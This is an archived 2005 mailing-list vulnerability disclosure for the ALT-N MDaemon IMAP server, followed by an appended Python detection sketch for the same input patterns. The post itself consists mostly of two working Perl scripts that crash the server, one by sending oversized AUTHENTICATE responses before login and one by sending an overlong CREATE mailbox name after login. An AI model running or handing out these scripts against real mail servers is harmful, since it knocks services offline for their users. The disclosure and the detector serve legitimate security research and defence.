Message-ID: <42DBF3C9.50503@gmx.net>
Date: Tue Jul 19 00:02:54 2005
From: kingcope at gmx.net (kcope)
Subject: ALT-N MDaemon multiple vulnerabilities

Hello this is kcope,

There are two remote vulnerabilities in the latest ALT-N MDaemon imapd product.
I don't know if any of them is exploitable ... the stack based buffer overflow
seems promising, but it's not preauth so I didn't investigate it further.

1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD5
2.) Remote stack based buffer overflow after authentication in the imap CREATE statement

---snip---
###
### MDAEMON remote DoS exploit by kcope
### looks like there's a fault in the base64 decoder
### works also for AUTHENTICATE LOGIN
###

use IO::Socket::INET;

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '143',
                              Proto    => 'tcp');

$a = "q" x 1000;

print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
print $sock $a,"\r\n";
print $sock $a,"\r\n";

while (<$sock>) {
    print $_;    
}
---snip---


---snip---
### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '143',
                              Proto    => 'tcp');

$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;

print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";

while (<$sock>) {
    print $_;    
}
---snip---

-kcope
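
Added example, not part of kcope's post and not ALT-N code: a detection sketch that scans the client side of an IMAP session for the two input shapes the post describes, an oversized or malformed AUTHENTICATE continuation response and an oversized CREATE mailbox argument. The length limits, the function name and the sample session are assumptions made for illustration.

```python
import base64
import binascii
import re

# Assumed limits, not taken from the post; tune them for your own server.
MAX_SASL_LINE = 512     # bytes in one AUTHENTICATE continuation response
MAX_MAILBOX_NAME = 255  # bytes in a CREATE mailbox argument
TAGGED = re.compile(rb"^(\S+) (\S+)(?: (.*))?$")  # tag SP command [SP args]
LITERAL = re.compile(rb"^\{(\d+)\+?\}$")          # {n} or {n+} literal prefix

def inspect_client_lines(lines):
    """Return [(line_no, reason)] for client-to-server IMAP lines."""
    findings, in_sasl = [], False
    for no, raw in enumerate(lines, 1):
        line = raw.rstrip(b"\r\n")
        m = TAGGED.match(line)
        if in_sasl and not m:
            # Base64 never contains a space, so a space-free line is treated
            # as part of the SASL exchange; "*" cancels it.
            if line == b"*":
                in_sasl = False
                continue
            if len(line) > MAX_SASL_LINE:
                findings.append((no, "oversized SASL response"))
            try:
                base64.b64decode(line, validate=True)
            except (binascii.Error, ValueError):
                findings.append((no, "SASL response is not valid base64"))
            continue
        in_sasl = False
        if not m:
            findings.append((no, "not a tagged command"))
            continue
        command, args = m.group(2).upper(), m.group(3) or b""
        if command == b"AUTHENTICATE":
            in_sasl = True
        elif command == b"CREATE":
            lit = LITERAL.match(args)
            size = int(lit.group(1)) if lit else len(args.strip(b'"'))
            if size > MAX_MAILBOX_NAME:
                findings.append((no, "oversized CREATE mailbox name"))
    return findings

# Constructed sample session (not captured traffic).
SAMPLE = [
    b"a001 AUTHENTICATE CRAM-MD5\r\n", b"Q" * 1000 + b"\r\n", b"!!!!\r\n",
    b"a002 LOGIN username password\r\n", b'a003 CREATE "INBOX/reports"\r\n',
    b"a004 CREATE " + b"A" * 500 + b"\r\n", b"a005 CREATE {4096}\r\n",
]
```

Calling `inspect_client_lines(SAMPLE)` reports lines 2, 3, 6 and 7; the same checks belong in a proxy or IDS rule in front of the server, since the CREATE case only appears after a successful login.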

